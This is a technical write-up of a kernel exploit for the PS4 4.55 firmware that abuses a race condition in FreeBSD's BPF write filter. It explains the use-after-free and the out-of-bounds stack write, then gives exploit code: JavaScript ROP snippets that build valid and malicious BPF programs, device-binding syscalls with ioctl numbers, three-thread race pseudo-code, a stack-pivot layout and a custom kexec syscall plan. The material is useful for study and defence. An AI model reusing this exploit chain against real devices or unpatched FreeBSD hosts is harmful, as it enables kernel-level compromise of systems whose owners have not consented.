**Note: While this bug is primarily interesting for exploitation on the PS4, this bug can also potentially be exploited on other unpatched platforms using FreeBSD if the attacker has read/write permissions on /dev/bpf, or if they want to escalate from root user to kernel code execution. As such, I've published it under the "FreeBSD" folder and not the "PS4" folder.**
# Introduction
Welcome to the kernel portion of the PS4 4.55FW full exploit chain write-up. This bug was found by qwerty, and is fairly unique in the way it's exploited, so I wanted to do a detailed write-up on how it worked. The full source of the exploit can be found [here](https://github.com/Cryptogenic/PS4-4.55-Kernel-Exploit). I've previously covered the webkit exploit implementation for userland access [here](https://github.com/Cryptogenic/Exploit-Writeups/blob/master/WebKit/setAttributeNodeNS%20UAF%20Write-up.md).
# Throwback to 4.05
If you read my 4.05 kernel exploit write-up, you may have noticed that I left out how I managed to dump the kernel before obtaining code execution. I also left out the target object that was used before the `cdev` object. This target object was, in fact, `bpf_d`. Because this BPF-based exploit was not public at the time and was a 0-day, I omitted it from my write-up and rewrote the exploit to use an entirely different object (this turned out to be for the better, as `cdev` turned out to be more stable anyway).
BPF was a nice target object for 4.05, as not only did it contain function pointers to jumpstart code execution, but also had a method for obtaining an arbitrary read primitive which I will detail below. While it's not entirely needed, it is helpful in the way that we don't have to write dumper code later. This section is not very relevant to the 4.55 exploit, so I will keep it brief, but feel free to skip this section if you only care about 4.55.
The `bpf_d` object has fields related to "slots" for storing data. Since this section is just a tidbit for an older exploit, I will only include the fields relevant to this section.
[src](http://fxr.watson.org/fxr/source/net/bpfdesc.h?v=FREEBSD90#L52)
```c
struct bpf_d {
// ...
caddr_t bd_hbuf; /* hold slot */ // Offset: 0x18
// ...
int bd_hlen; /* current length of hold buffer */ // Offset: 0x2C
// ...
int bd_bufsize; /* absolute length of buffers */ // Offset: 0x30
// ...
}
```
These slots are used to hold the information that gets sent back to someone who would `read()` on the bpf's file descriptor. By setting the offset at 0x18 (`bd_hbuf`) to the address of the location we want to dump, and 0x2C and 0x30 (`bd_hlen` and `bd_bufsize` respectively) to any size we choose (to dump the entire kernel, I chose 0x2800000), we can obtain an arbitrary kernel read primitive via the `read()` system call on the bpf file descriptor, and easily dump kernel memory.
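As a rough illustration of the three writes described above, the sketch below builds a byte image of the relevant part of a `bpf_d` with a `DataView`. The helper name `buildFakeBpfD`, the 0x38-byte image size, and the target address are assumptions for illustration; only the offsets (0x18, 0x2C, 0x30) and the 0x2800000 length come from the text.

```javascript
// Hypothetical helper: fill in the bpf_d fields that control what read() copies out.
function buildFakeBpfD(targetAddr, length) {
  const image = new DataView(new ArrayBuffer(0x38)); // just large enough for the fields used here
  image.setBigUint64(0x18, targetAddr, true); // bd_hbuf: address read() will copy from
  image.setInt32(0x2c, length, true);         // bd_hlen: current length of the hold buffer
  image.setInt32(0x30, length, true);         // bd_bufsize: absolute length of the buffers
  return image;
}

// Placeholder address, not a value taken from a real dump.
const fake = buildFakeBpfD(0xffffffff82200000n, 0x2800000);
console.log(fake.getBigUint64(0x18, true).toString(16), fake.getInt32(0x2c, true).toString(16));
```

How these bytes end up overlapping a live `bpf_d` is the job of the 4.05 exploit itself and is not modelled here.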
# FreeBSD or Sony's fault? Why not both...
Interestingly, this bug is actually a FreeBSD bug and was not (at least directly) introduced by Sony code. While this is a FreeBSD bug however, it's not very useful for most systems because the /dev/bpf device driver is root-owned, and the permissions for it are set to 0600 (meaning owner has read/write privileges, and nobody else does) - though it can be used for escalating from root to kernel mode code execution. However, let’s take a look at the `make_dev()` call inside the PS4 kernel for /dev/bpf (taken from a 4.05 kernel dump).
```
seg000:FFFFFFFFA181F15B lea rdi, unk_FFFFFFFFA2D77640
seg000:FFFFFFFFA181F162 lea r9, aBpf ; "bpf"
seg000:FFFFFFFFA181F169 mov esi, 0
seg000:FFFFFFFFA181F16E mov edx, 0
seg000:FFFFFFFFA181F173 xor ecx, ecx
seg000:FFFFFFFFA181F175 mov r8d, 1B6h
seg000:FFFFFFFFA181F17B xor eax, eax
seg000:FFFFFFFFA181F17D mov cs:qword_FFFFFFFFA34EC770, 0
seg000:FFFFFFFFA181F188 call make_dev
```
We see UID 0 (the UID for the root user) getting moved into the register for the 3rd argument, which is the owner argument. However, the permission bits are being set to 0x1B6, which in octal is 0666. This means *anyone* can open /dev/bpf with read/write privileges. I’m not sure why this is the case; qwerty speculates that perhaps bpf is used for LAN gaming. In any case, this was a poor design decision because bpf is usually considered privileged, and should not be accessible to a process that is completely untrusted, such as WebKit. On most platforms, permissions for /dev/bpf will be set to 0x180, or 0600.
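To double-check the hex-to-octal conversion, here is a small sketch that decodes a mode value into octal and `rwx` notation. The function name `describeMode` is made up for this example.

```javascript
// Decode a Unix permission value into octal and rwx notation.
function describeMode(mode) {
  const rwx = ["---", "--x", "-w-", "-wx", "r--", "r-x", "rw-", "rwx"];
  const octal = "0" + (mode & 0o777).toString(8).padStart(3, "0");
  const text = [(mode >> 6) & 7, (mode >> 3) & 7, mode & 7].map((bits) => rwx[bits]).join("");
  return { octal, text };
}

console.log(describeMode(0x1b6)); // value passed to make_dev() on the PS4
console.log(describeMode(0x180)); // value typically used on other platforms
```

The first call yields `0666` / `rw-rw-rw-` (owner, group, and everyone else can read and write), while the second yields `0600` / `rw-------`.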
# Race Conditions - What are they?
The class of the bug abused in this exploit is known as a "race condition". Before we get into bug specifics, it's important for the reader to understand what race conditions are and how they can be an issue (especially in something like a kernel). Often in complex software (such as a kernel), resources will be shared (or "global"). This means other threads could potentially execute code that will access some resource that could be accessed by another thread at the same point in time. What happens if one thread accesses this resource while another thread does without exclusive access? Race conditions are introduced.
Race conditions are defined as possible scenarios where events happen in a sequence different than the developer intended, which leads to undefined behavior. In simple, single-threaded programs, this is not an issue because execution is linear. In more complex programs where code can be running in parallel, however, this becomes a real issue. To prevent these problems, atomic instructions and locking mechanisms were introduced. When one thread wants to access a critical resource, it will attempt to acquire a "lock". If another thread is already using this resource, generally the thread attempting to acquire the lock will wait until the other thread is finished with it. Each thread must release the lock to the resource after they're done with it; failure to do so could result in a deadlock.
While locking mechanisms such as mutexes have been introduced, developers sometimes struggle to use them properly. For example, what if a piece of shared data gets validated and processed, but while the processing of the data is locked, the validation is not? There is a window between validation and locking where that data can change, and while the developer thinks the data has been validated, it could be substituted with something malicious after it is validated, but before it is used. Parallel programming can be difficult, especially when, as a developer, you also want to factor in the fact that you don't want to put too much code in between locking and unlocking as it can impact performance.
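The check-then-use window can be modelled deterministically, without real threads. In the sketch below, the "other thread" is just a callback invoked between the check and the use; all names (`shared`, `check`, `use`, `request`) are hypothetical and only stand in for the pattern described above.

```javascript
const LIMIT = 16;
const shared = { index: 3 }; // data that both "threads" can reach

function check() { return shared.index < LIMIT; } // time of check
function use() { return shared.index; }           // time of use: trusts the earlier check

function request(raceWindowHook) {
  if (!check()) return "rejected";
  raceWindowHook(); // nothing is locked here, so another thread may run
  const used = use();
  return used < LIMIT ? "ok" : "used unchecked index " + used;
}

shared.index = 3;
const quiet = request(() => {});                      // no interference
shared.index = 3;
const raced = request(() => { shared.index = 30; });  // the other thread wins the race
console.log(quiet, "|", raced);
```

The second request passes validation with index 3 but ends up using index 30, which is the shape of the bug exploited later in this write-up.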
For more on race conditions, see Microsoft's page on it [here](https://support.microsoft.com/en-us/help/317723/description-of-race-conditions-and-deadlocks)
# Packet Filters - What are they?
Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by `bpf_filter()`. While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside its buffer. Breaking down the BPF VM in its entirety is far beyond the scope of this write-up; just know that the code produced by it is run in **kernel** mode - this is why read/write access to `/dev/bpf` *should* be privileged.
You can reference the opcodes that the BPF VM takes [here](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L995).
# Out-of-bounds Write Primitive
If we take a look at the "STOREX" mnemonic's handler in `bpf_filter()`, we see the following code:
[src](http://fxr.watson.org/fxr/source/net/bpf_filter.c?v=FREEBSD90#L376)
```c
u_int32_t mem[BPF_MEMWORDS];
// ...
case BPF_STX:
mem[pc->k] = X;
continue;
```
This is immediately interesting to us as exploit developers. If we can set `pc->k` to any arbitrary value, we can use this to establish an out-of-bounds write primitive on the stack. This can be extremely helpful; for instance, we can use it to corrupt the return pointer stored on the stack so that when `bpf_filter()` returns, we can start a ROP chain. This is perfect, because not only is it a trivial attack strategy to implement, but it is also stable as we don't have to worry about the issues that typically come with classic stack/heap smashing.
Unfortunately, instructions run through a validator, so trying to set `pc->k` in a way that would be outside the boundaries of `mem` will fail the validation check. But what if malicious instructions could be substituted in post-validation? There would be a "time of check, time of use" (TOCTOU) issue present.
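To make the validation step concrete, here is a simplified model of the part of the validator that matters for this bug: store instructions must index inside `mem`, and the program must end in a return. This is a sketch, not a port of `bpf_validate()`; the real function checks considerably more (jump targets, opcode validity, and so on), and `validateSketch` is a hypothetical name.

```javascript
const BPF_MEMWORDS = 16;
const BPF_ST = 0x02, BPF_STX = 0x03, BPF_RET = 0x06;
const bpfClass = (code) => code & 0x07;

// Simplified model: only the scratch-memory bound and the "must end in RET" rule.
function validateSketch(insns) {
  if (insns.length === 0) return false;
  for (const { code, k } of insns) {
    const cls = bpfClass(code);
    if ((cls === BPF_ST || cls === BPF_STX) && k >= BPF_MEMWORDS) return false;
  }
  return bpfClass(insns[insns.length - 1].code) === BPF_RET;
}

const benign = [{ code: 0x00, k: 0 }, { code: 0x06, k: 0 }];
const malicious = [{ code: 0x01, k: 0x41414141 }, { code: 0x03, k: 0x1e }, { code: 0x06, k: 1 }];
console.log(validateSketch(benign), validateSketch(malicious));
```

The benign program passes and the one storing to index 0x1E is rejected, so out-of-bounds instructions can only reach the interpreter if they arrive after this check has already run.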
# Race, Replace
## Setting Filters
If we take a look at `bpfioctl()`, we'll notice there are various commands for managing the interface, setting buffer properties, and of course, setting up read/write filters (a list of these commands can be found on the [FreeBSD man page](https://www.freebsd.org/cgi/man.cgi?query=bpf&sektion=4&manpath=FreeBSD+7.1-RELEASE)). If we pass the "BIOCSETWF" command (noted by `0x8010427B` in low-level), `bpf_setf()` is called to set a filter on the given device.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L1151)
```c
case BIOCSETF:
case BIOCSETFNR:
case BIOCSETWF:
#ifdef COMPAT_FREEBSD32
case BIOCSETF32:
case BIOCSETFNR32:
case BIOCSETWF32:
#endif
error = bpf_setf(d, (struct bpf_program *)addr, cmd);
break;
```
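The raw command value `0x8010427B` is not arbitrary. FreeBSD ioctl numbers pack a direction, a parameter size, a group character, and a command number into 32 bits (see `<sys/ioccom.h>`). The decoder below is a small sketch of that layout; `decodeIoctl` is a name made up for this example.

```javascript
// Field layout from FreeBSD's <sys/ioccom.h>.
const IOCPARM_MASK = 0x1fff;
const DIRECTIONS = { 0x20000000: "void", 0x40000000: "out", 0x80000000: "in", 0xc0000000: "inout" };

function decodeIoctl(cmd) {
  return {
    direction: DIRECTIONS[(cmd & 0xe0000000) >>> 0],  // "in" means parameters are copied into the kernel
    paramLength: (cmd >>> 16) & IOCPARM_MASK,         // size of the argument structure in bytes
    group: String.fromCharCode((cmd >>> 8) & 0xff),   // 'B' for bpf
    number: cmd & 0xff,
  };
}

console.log(decodeIoctl(0x8010427b)); // BIOCSETWF
```

For `0x8010427B` this gives direction `in`, a 0x10-byte parameter (the size of `struct bpf_program`), group `B`, and command number 123.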
If you look at where the instructions are copied into kernel, you'll also see that `bpf_validate()` will run immediately, meaning at this point we cannot specify a `pc->k` value that allows out-of-bounds access.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L1583)
```c
// ...
size = flen * sizeof(*fp->bf_insns);
fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);
if (copyin((caddr_t)fp->bf_insns, (caddr_t)fcode, size) == 0 && bpf_validate(fcode, (int)flen)) {
// ...
}
// ...
```
## Lack of Ownership
We've taken a look at the code that sets a filter, now let's take a look at the code that uses a filter. The function `bpfwrite()` is called when a process calls the `write()` system call on a valid bpf device. We can see this via the following function table for bpf's backing `cdevsw`:
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L183)
```c
static struct cdevsw bpf_cdevsw = {
.d_version = D_VERSION,
.d_open = bpfopen,
.d_read = bpfread,
.d_write = bpfwrite,
.d_ioctl = bpfioctl,
.d_poll = bpfpoll,
.d_name = "bpf",
.d_kqfilter = bpfkqfilter,
};
```
The purpose of `bpfwrite()` is to allow the user to write packets to the interface. Any packets passed into `bpfwrite()` will pass through the write filter that is set on the interface, which is set via the IOCTL that is detailed in the "Setting Filters" sub-section.
It first does some privilege checks (which are irrelevant because on the PS4, any untrusted process can successfully write to it due to everyone having R/W permissions on the device), and sets up some buffers before calling `bpf_movein()`.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L911)
```c
bzero(&dst, sizeof(dst));
m = NULL;
hlen = 0;
error = bpf_movein(uio, (int)d->bd_bif->bif_dlt, ifp, &m, &dst, &hlen, d->bd_wfilter);
if (error) {
d->bd_wdcount++;
return (error);
}
d->bd_wfcount++;
```
Let's take a look at `bpf_movein()`.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L504)
```c
*mp = m;
if (m->m_len < hlen) {
error = EPERM;
goto bad;
}
error = uiomove(mtod(m, u_char *), len, uio);
if (error)
goto bad;
slen = bpf_filter(wfilter, mtod(m, u_char *), len, len);
if (slen == 0) {
error = EPERM;
goto bad;
}
```
Notice, there is absolutely no locking present in `bpf_movein()`, nor in `bpfwrite()` - the caller. Therefore, `bpf_filter()`, the function that executes a given filter program on the device, is called in an unlocked state. Additionally, `bpf_filter()` itself doesn't do any locking. No ownership is maintained or even obtained in the process of executing the write filter. What would happen if this filter was free()'d after it was validated via `bpf_setf()` when setting the filter, and was reallocated with invalid instructions while the filter is executing? :)
By racing three threads (one setting a valid, non-malicious filter, one setting an invalid, malicious filter, and one trying to continuously `write()` to bpf), there is a possible (and very exploitable) scenario where valid instructions can be replaced with invalid instructions, and we can influence `pc->k` to write out-of-bounds on the stack.
## Freeing the Filter
We need a method to be able to free() the filter in another thread while it's still running to trigger a use-after-free() situation. Looking at `bpf_setf()`, notice that before allocating a new buffer for the filter instructions, it will first check if there is an old one - if there is it will destroy it.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L1523)
```c
static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd) {
struct bpf_insn *fcode, *old;
// ...
if (cmd == BIOCSETWF) {
old = d->bd_wfilter;
wfilter = 1;
// ...
} else {
wfilter = 0;
old = d->bd_rfilter;
// ...
}
// ...
if (old != NULL)
free((caddr_t)old, M_BPF);
// ...
fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);
// ...
if (wfilter)
d->bd_wfilter = fcode;
else {
d->bd_rfilter = fcode;
// ...
if (cmd == BIOCSETF)
reset_d(d);
}
}
// ...
}
```
Because `bpf_filter()` has a copy of `d->bd_wfilter`, when it is free()'d in one thread to replace the filter, the second thread will also use the same pointer (which is now free()'d) resulting in a use-after-free(). The thread attempting to set an invalid filter effectively ends up spraying the heap as a result, and will eventually get allocated into the same address. Our three threads will do the following:
1) Continuously set a filter with valid instructions, passing the validation checks.
2) Continuously set another filter with invalid instructions, freeing and replacing the old instructions with new ones (our malicious ones).
3) Continuously write to bpf. Eventually, the "valid" filter will be corrupted with the invalid one post-validation and write() will use it, resulting in memory corruption. Specially crafted instructions can be used to overwrite the return address on the stack to obtain code execution in kernel mode.
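The interleaving that makes this work can be sketched with a toy allocator. `ToyHeap` is purely hypothetical: it hands back the most recently freed chunk of a given size, which is a deliberate simplification of how the real kernel allocator behaves. The steps are run in one fixed order here, whereas the real exploit has to win this ordering by racing.

```javascript
// Toy allocator: freed chunks of a given size go on a LIFO free list and are handed out again.
class ToyHeap {
  constructor() { this.chunks = []; this.freeLists = new Map(); }
  malloc(size) {
    const list = this.freeLists.get(size) || [];
    if (list.length > 0) return list.pop();   // reuse the most recently freed chunk
    this.chunks.push({ size, data: null });
    return this.chunks.length - 1;            // the "address" is just an index here
  }
  free(addr) {
    const size = this.chunks[addr].size;
    if (!this.freeLists.has(size)) this.freeLists.set(size, []);
    this.freeLists.get(size).push(addr);
  }
}

const heap = new ToyHeap();

// Thread 1: set a validated filter (9 instructions * 8 bytes = 0x48) on device 1.
const validFilter = heap.malloc(0x48);
heap.chunks[validFilter].data = "valid";

// Thread 3: write() has already picked up the filter pointer.
const pointerHeldByWrite = validFilter;

// Thread 1 again: setting a new filter frees the old one first.
heap.free(validFilter);

// Thread 2: the other device allocates a same-sized buffer and lands in the freed chunk.
// copyin() fills it with our instructions before validation gets a chance to reject them.
const invalidFilter = heap.malloc(0x48);
heap.chunks[invalidFilter].data = "malicious";

console.log(heap.chunks[pointerHeldByWrite].data);
```

The stale pointer held by the writer now resolves to the malicious contents, even though the only filter ever accepted on that device was the valid one.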
# Setting a Valid Program
First, we need to set up a `bpf_program` object to pass to the ioctl() for setting a filter. The structure for `bpf_program` is below:
[src](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L65)
```c
struct bpf_program { // Size: 0x10
u_int bf_len; // 0x00
struct bpf_insn *bf_insns; // 0x08
};
```
It's important to note that `bf_len` is *not* the size of the program's instructions in bytes, but rather the number of instructions. This means the value we specify for `bf_len` will be the total size of our instructions in memory divided by the size of an instruction, which is eight bytes.
[src](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L1050)
```c
struct bpf_insn { // Size: 0x08
u_short code; // 0x00
u_char jt; // 0x02
u_char jf; // 0x03
bpf_u_int32 k; // 0x04
};
```
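The relationship between the byte size and `bf_len` can be checked with a small encoder that packs instructions into the `struct bpf_insn` layout shown above. `encodeProgram` is a hypothetical helper, not part of the exploit; it assumes a little-endian target such as the PS4's x86-64 CPU.

```javascript
const BPF_INSN_SIZE = 8;

// Pack { code, jt, jf, k } objects into the little-endian layout of struct bpf_insn.
function encodeProgram(insns) {
  const bytes = new DataView(new ArrayBuffer(insns.length * BPF_INSN_SIZE));
  insns.forEach(({ code, jt = 0, jf = 0, k = 0 }, i) => {
    const base = i * BPF_INSN_SIZE;
    bytes.setUint16(base + 0x00, code, true);
    bytes.setUint8(base + 0x02, jt);
    bytes.setUint8(base + 0x03, jf);
    bytes.setUint32(base + 0x04, k, true);
  });
  return bytes;
}

const encoded = encodeProgram([{ code: 0x00 }, { code: 0x00 }, { code: 0x06 }]);
const bfLen = encoded.byteLength / BPF_INSN_SIZE; // bytes divided by 8 gives the instruction count
console.log(encoded.byteLength, bfLen);
```

Three instructions occupy 24 bytes, so the matching `bf_len` is 3, not 24.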
A valid program is easy to write: we can simply write a bunch of NOP (no operation) pseudo-instructions with a "return" pseudo-instruction at the end. By looking at `bpf.h`, we can determine that the opcodes we can use for a NOP and a RET are 0x00 and 0x06 respectively.
[src](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L995)
```c
#define BPF_LD 0x00 // By specifying 0's for the args it effectively does nothing
#define BPF_RET 0x06
```
Below is a code snippet from the exploit implemented in JS ROP chains to setup a valid BPF program in memory:
```javascript
// Setup valid program
var bpf_valid_prog = malloc(0x10);
var bpf_valid_instructions = malloc(0x80);
p.write8(bpf_valid_instructions.add32(0x00), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x08), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x10), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x18), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x20), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x28), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x30), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x38), 0x00000000);
p.write4(bpf_valid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_valid_instructions.add32(0x44), 0x00000000);
p.write8(bpf_valid_prog.add32(0x00), 0x00000009);
p.write8(bpf_valid_prog.add32(0x08), bpf_valid_instructions);
```
# Setting an Invalid Program
This program is where we want to write our malicious code that will corrupt memory on the stack when executed via `write()`. This program is almost as simple as the valid program, as it only contains 9 pseudo-instructions. We can abuse the "LDX" and "STX" instructions to write data on the stack by first loading the value we want to write (32 bits) into the index register, then storing the index register into an index of what *should* be scratch memory. Because the instructions are invalid, however, the store actually writes out-of-bounds and corrupts the function's return pointer. Here is an outline of the instructions we want to run in our malicious filter:
```
LDX X <- {lower 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1E] <- X
LDX X <- {upper 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1F] <- X
LDX X <- {lower 32-bits of kernel ROP chain fake stack address}
STX M[0x20] <- X
LDX X <- {upper 32-bits of kernel ROP chain fake stack address}
STX M[0x21] <- X
RET
```
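The outline above follows a regular pattern: each 64-bit value is split into a low and a high 32-bit half, and each half gets one LDX/STX pair. The generator below is a sketch of that pattern; `buildStackWriter` is a hypothetical helper and the two addresses are placeholders, not real gadget or stack locations.

```javascript
const BPF_LDX_IMM = 0x01, BPF_STX = 0x03, BPF_RET = 0x06;

// Emit LDX/STX pairs that store each 64-bit value as two 32-bit words starting at startIndex.
function buildStackWriter(startIndex, values) {
  const insns = [];
  let index = startIndex;
  for (const value of values) {
    // Low word first, since the target is little-endian.
    const halves = [Number(value & 0xffffffffn), Number(value >> 32n)];
    for (const half of halves) {
      insns.push({ code: BPF_LDX_IMM, k: half }); // X <- half
      insns.push({ code: BPF_STX, k: index++ });  // M[index] <- X
    }
  }
  insns.push({ code: BPF_RET, k: 1 });
  return insns;
}

// Placeholder values standing in for the pivot gadget and the fake stack address.
const program = buildStackWriter(0x1e, [0xffffffff82345678n, 0x0000000926200000n]);
console.log(program.length);
```

Two 64-bit values produce eight load/store instructions plus the final return, which matches the nine pseudo-instructions in the outline.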
Note that `mem` is an array of `u_int32_t`, which is why our write indexes increase by only 1 instead of 4. Let's take a look at `mem`'s full definition:
[src](http://fxr.watson.org/fxr/source/net/bpf_filter.c?v=FREEBSD90#L178)
```c
#define BPF_MEMWORDS 16
// ...
u_int32_t mem[BPF_MEMWORDS];
```
Notice, the buffer is only allocated for 64 bytes (16 values * 4 bytes per value) - but our instructions are accessing indexes 30, 31, 32, and 33, which are obviously way out of bounds of the buffer. Because the filter was substituted in post-validation, nothing catches this and thus an OOB write is born.
Indexes 0x1E and 0x1F (30 and 31) are the location on the stack of the return address. By overwriting it with the address of a `pop rsp; ret;` gadget and writing the value we want to pop into the RSP register at indexes 0x20 and 0x21 (32 and 33), we can successfully pivot the stack to that of our fake stack for our kernel ROP chain to obtain code execution in ring0.
![](https://i.imgur.com/RmBzWK0.gif)
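To see the overwrite happen, here is a toy model of the interpreter's stack frame. It is only a sketch: the frame is a flat `Uint32Array` in which words 0 to 15 play the role of `mem` and words 30 and 31 hold the saved return address, mirroring the indexes described above. The function name `runFilter` and all values are placeholders.

```javascript
// Toy model of bpf_filter()'s frame: mem[] is words 0..15, the saved return address is words 30..31.
function runFilter(insns) {
  const frame = new Uint32Array(40);
  frame[30] = 0x1111aaaa; frame[31] = 0xffffffff; // placeholder "legitimate" return address
  let X = 0;
  for (const { code, k } of insns) {
    if (code === 0x01) X = k >>> 0;       // LDX (immediate): X <- k
    else if (code === 0x03) frame[k] = X; // STX: mem[k] <- X, with no bounds check
    else if (code === 0x06) break;        // RET
  }
  const word = (i) => frame[i].toString(16).padStart(8, "0");
  return { returnAddress: word(31) + word(30), nextStackSlot: word(33) + word(32) };
}

const result = runFilter([
  { code: 0x01, k: 0x82345678 }, { code: 0x03, k: 0x1e },
  { code: 0x01, k: 0xffffffff }, { code: 0x03, k: 0x1f },
  { code: 0x01, k: 0x26200000 }, { code: 0x03, k: 0x20 },
  { code: 0x01, k: 0x00000009 }, { code: 0x03, k: 0x21 },
  { code: 0x06, k: 1 },
]);
console.log(result);
```

After the run, the saved return address reads `ffffffff82345678` (the stand-in for the `pop rsp` gadget) and the slot right after it reads `0000000926200000` (the stand-in for the fake stack), which is the state the pivot relies on.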
Below is a code snippet from the exploit to setup an invalid, malicious BPF program in memory:
```javascript
// Setup invalid program
var entry = window.gadgets["pop rsp"];
var bpf_invalid_prog = malloc(0x10);
var bpf_invalid_instructions = malloc(0x80);
p.write4(bpf_invalid_instructions.add32(0x00), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x04), entry.low);
p.write4(bpf_invalid_instructions.add32(0x08), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x0C), 0x0000001E);
p.write4(bpf_invalid_instructions.add32(0x10), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x14), entry.hi);
p.write4(bpf_invalid_instructions.add32(0x18), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x1C), 0x0000001F);
p.write4(bpf_invalid_instructions.add32(0x20), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x24), kchainstack.low);
p.write4(bpf_invalid_instructions.add32(0x28), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x2C), 0x00000020);
p.write4(bpf_invalid_instructions.add32(0x30), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x34), kchainstack.hi);
p.write4(bpf_invalid_instructions.add32(0x38), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x3C), 0x00000021);
p.write4(bpf_invalid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_invalid_instructions.add32(0x44), 0x00000001);
p.write8(bpf_invalid_prog.add32(0x00), 0x00000009);
p.write8(bpf_invalid_prog.add32(0x08), bpf_invalid_instructions);
```
# Creating and Binding Devices
To set up the corruption portion of the race, we need to open two instances of /dev/bpf. We will then bind them to a valid interface. The interface you bind to matters depending on how the system is connected to the network: if it is a wired (ethernet) connection, you'll want to bind to the "eth0" interface; if you're connected via wifi, you'll want to bind to the "wlan0" interface. The exploit automatically determines which interface to use by performing a test. The test essentially attempts to `write()` to the given interface; if it is invalid, `write()` will fail and return -1. If this occurs after binding to the "eth0" interface, the exploit will attempt to rebind to "wlan0" and check again. If `write()` again returns -1, the exploit bails and reports that it failed to bind the device.
```javascript
// Open first device and bind
var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));
if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
throw "Failed to bind to first /dev/bpf device!";
}
}
```
The same process is then repeated for the second device.
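Since both devices go through the same try-then-fall-back logic, it could be factored into a helper along these lines. This is a sketch rather than code from the exploit: `bindFirstWorking` is a hypothetical name, and the `syscall` and `stringify` parameters stand in for the exploit's own `p.syscall` and `stringify`. A mock is used below so the snippet runs on its own.

```javascript
const BIOCSETIF = 0x8020426c;

// Try each interface name in turn and return the first one that accepts a test write().
function bindFirstWorking(syscall, stringify, fd, names, testBuf) {
  for (const name of names) {
    syscall("sys_ioctl", fd, BIOCSETIF, stringify(name));
    if (syscall("sys_write", fd, testBuf, 40).low !== (-1 >>> 0)) return name;
  }
  throw new Error("Failed to bind /dev/bpf device to any of: " + names.join(", "));
}

// Mock standing in for p.syscall: pretends only "wlan0" is usable.
let bound = null;
const mockSyscall = (name, fd, a, b) => {
  if (name === "sys_ioctl") { bound = b; return { low: 0 }; }
  return { low: bound === "wlan0" ? 40 : (-1 >>> 0) };
};

const chosen = bindFirstWorking(mockSyscall, (s) => s, 3, ["eth0", "wlan0"], null);
console.log(chosen);
```

With the mock, the "eth0" attempt fails its test write and the helper falls back to "wlan0", the same order the exploit uses.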
# Setting Filters in Parallel
To cause memory corruption, we need two threads running in parallel which continuously set filters on their own devices. Eventually, the valid filter will be free()'d, reallocated, and corrupted with the invalid filter. To do this, each thread essentially does the following (pseudo-code):
```c
// 0x8010427B = BIOCSETWF
void threadOne() // Sets a valid program
{
for(;;)
{
ioctl(fd1, 0x8010427B, bpf_valid_program);
}
}
void threadTwo() // Sets an invalid program
{
for(;;)
{
ioctl(fd2, 0x8010427B, bpf_invalid_program);
}
}
```
# Triggering Code Execution
So we can corrupt the filters and substitute in our invalid instructions, but we need the filter to actually get run to trigger code execution via the corrupted return address. Since we're setting a "write" filter, `bpfwrite()` is a perfect candidate to do this. This means we need a third thread to run that will constantly `write()` to the first bpf device. When the filter eventually gets corrupted, the next `write()` will run the invalid filter, causing the stack memory to be corrupted, and will jump to any address we specify, allowing us to (fairly trivially) obtain code execution in ring0.
```c
void threadThree() // Tries to trigger code execution
{
void *scratch = (void *)malloc(0x200);
for(;;)
{
ssize_t n = write(fd1, scratch, 0x200); // write() returns a signed byte count, or -1 on failure
if(n == 0x200)
{
break;
}
}
}
```
# Installing a "kexec()" syscall
Our ultimate goal with the kROP chain is to install a custom system call that will execute code in kernel mode. To keep things consistent with 4.05, we again will use syscall #11. The signature of the syscall will be as follows:
```c
sys_kexec(void *code, void *uap);
```
Doing this is fairly trivial; we just have to add an entry into the `sysent` table. An entry in the `sysent` table follows this structure:
[src](http://fxr.watson.org/fxr/source/sys/sysent.h?v=FREEBSD90#L56)
```c
struct sysent { /* system call table */
int sy_narg; /* number of arguments */
sy_call_t *sy_call; /* implementing function */
au_event_t sy_auevent; /* audit event associated with syscall */
systrace_args_func_t sy_systrace_args_func;
/* optional argument conversion function. */
u_int32_t sy_entry; /* DTrace entry ID for systrace. */
u_int32_t sy_return; /* DTrace return ID for systrace. */
u_int32_t sy_flags; /* General flags for system calls. */
u_int32_t sy_thrcnt;
};
```
